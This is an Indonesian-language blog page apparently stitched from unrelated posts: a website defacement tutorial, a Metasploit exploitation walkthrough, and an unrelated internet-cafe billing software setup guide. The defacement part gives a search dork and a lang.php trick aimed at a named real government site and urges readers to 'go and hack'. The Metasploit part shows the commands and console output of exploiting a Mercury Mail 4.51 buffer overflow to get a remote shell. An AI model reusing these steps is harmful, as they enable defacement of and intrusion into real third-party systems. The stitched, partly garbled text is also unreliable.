Halloween Costume ideas 2015

Software, Film dan Artikel Terbaru dan Terpopuler - Menyediakan Software terbaru dan juga pastinya Full Version, Film terbaru yang pasti HD, dan Artikel yang bermanfaat.

Articles by "server"


jadi mari mulai

exploit: 

Dork :
allinurl:/xampp/



sekarang kita punya website ini


 
jika link itu déferrent hanya mengubahnya ke ini
http://www.puertoesmeraldas.gob.ec/xampp/index.php
untuk deface itu
hanya menghapus index.php
dan menambahkan untuk itu lang.php ? kj - fido_was_here
http://www.puertoesmeraldas.gob.ec/xampp/lang.php?kj-fido_was_here
kj - fido sini mengubahnya nama Hacked_By_you Anda
 
kesalahan akan muncul
itu berarti Oke/




sekarang pergi dan memeriksa situs tetapi jangan lupa untuk menambahkan link
xampp / lang.tmp
untuk
http://www.puertoesmeraldas.gob.ec
=
ini: 3
 
 http://www.puertoesmeraldas.gob.ec/xampp/lang.tmp



Keberhasilan !!



 
 
sekarang pergi dan hack



     
    Sebelumnya penulis telah mencontohkan bagaimana cara melakukan hacking pada suatu web server dan ftp server untuk mendapatkan shell, saat ini saya akan membahas praktek cara melakukan hacking pada mail server.  Fungsi Mail Server digunakan untuk menerima dan menyimpan e-mail yang masuk, nah disini saya akan mencontohkan bagaimana cara melakukan hack salah satu mail server yang mempunyai celah keamanan Buffer Overflow yaitu Mercury Mail Transport System pada versi 4.51 sehingga kita ahkirnya mendapatkan shell.
Disini IP target adalah 192.168.1.21.

Kita dapat coba scan pakai NMAP untuk mengetahui bahwa target port untuk SMTP yaitu 25 terbuka.

Dengan mengetahui port 25 terbuka itu tidak cukup, kita perlu mengetahuinya lebih jauh. Kita tunggu scan NMAP selesai dan hasilnya adalah :
Yeah ahkirnya kita mengetahui bahwa target menggunakan mail server Mercury, kita lihat dibawahnya pada port 143, ditampil service IMAPnya terlihat ada versi Mercury/32 imapd 4.51.
Kalau sudah mendapatkan informasi yang jelas dari aplikasi mail server target serta versinya, maka kita dapat cari exploitnya dan exploitnya ternyata ada di Metasploit Framework.
Berikut adalah exploitasinya :
########                  #
#################            #
######################         #
#########################      #
############################
##############################
###############################
###############################
##############################
#    ########   #
##        ###        ####   ##
###   ###
####   ###
####          ##########   ####
#######################   ####
####################   ####
##################  ####
############      ##
########        ###
#########        #####
############      ######
########      #########
#####       ########
###       #########
######    ############
#######################
#   #   ###  #   #   ##
########################
##     ##   ##     ##
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13644 updated yesterday (2011.08.26)
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-]          We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-]          then restore the removed files from quarantine or reinstall the framework. For more info:
[-]              https://community.rapid7.com/docs/DOC-1273
[-]
msf  exploit(mercury_cram_md5) > use exploit/windows/smtp/mercury_cram_md5
Perintah di atas kita memilih exploit mercury_cram_md5
msf  exploit(mercury_cram_md5) > set PAYLOAD windows/shell/bind_tcp
Perintah di atas kita memasukkan payloadnya dan payload yang digunakan adalah shell/bind_tcp
msf  exploit(mercury_cram_md5) > set RHOST 192.168.1.21
Di atas adalah perintah untuk memasukkan IP target.
msf  exploit(mercury_cram_md5) > exploit
Setelah selesai, kita ketik exploit seperti diatas lalu enter.
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.21
[*] Started bind handler
[*] Trying target Mercury Mail Transport System 4.51…
[*] Sending stage (240 bytes) to 192.168.1.21
[*] Command shell session 1 opened (192.168.1.22:2763 -> 192.168.1.21:4444) at 2011-08-28 06:39:50 -0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\MERCURY>
Binggo kita mendapatkan shell di komputer target melalui celah pada mail server.


[singlepic id=4 w=600 h=360 float=]

1. Jalankan setup Billing Xpress Server yang sudah Anda download dari website ini. Ikuti terus perintahnya sampai proses instalasi selesai

2. Jalankan Billing Server kemudian Pilih menu Login atau klik tombol login di pojok kiri atas
Isi kolom username dan password sebagai berikut:

Username: admin
Password: admin



3. Pilih menu Program → Settings…Kemudian pilih Workstation dan daftarkan masing-masing IP Addres PC Client yang sudah terhubung ke dalam jaringan



Keterangan:
Default Tarif, yaitu tarif awal (default) yang berlaku jika pelanggan login dengan memilih jenis login Umum pada billing client.
Tarif Member, yaitu tarif yang berlaku jika pelanggan login dengan memilih jenis login Member pada billing client.
  • Tutup dan jalankan kembali aplikasi Billing Xpress Server
  sumber : http://www.billing-xpress.com




  • Jika kita mempunya konfigurasi jaringan seperti di atas di mana Aplikasi Billing Server diinstall pada PC kasir dan Aplikasi Billing Client diinstall pada PC Client 1 sampai dengan PC Client 3, maka langkah-langkah setup Billing Client yang dilakukan adalah sebagai berikut:
    Jalankan file setup Billing Xpress Client yang sudah Anda download dari website ini. Kemudian ikuti terus perintahnya sampai proses instalasi selesai
    Di akhir proses instalasi biarkan opsi Jalankan Program Tester terceklis

Setelah muncul aplikasi Client Tester isilah kolom Server address dengan alamat IP di mana aplikasi Billing Xpress Server diinstall (PC Kasir). Pada contoh konfigurasi gambar di atas, Billing Xpress Server diinstall di PC dengan alamat 192.168.1.100. Kemudian klik tombol Connect.






Dan pada sisi server indikator akan berwarna kuning seperti pada gambar di bawah ini.






Setelah koneksi berhasil, Restart PC Client.


MKRdezign

Formulir Kontak

Nama

Email *

Pesan *

Diberdayakan oleh Blogger.
Javascript DisablePlease Enable Javascript To See All Widget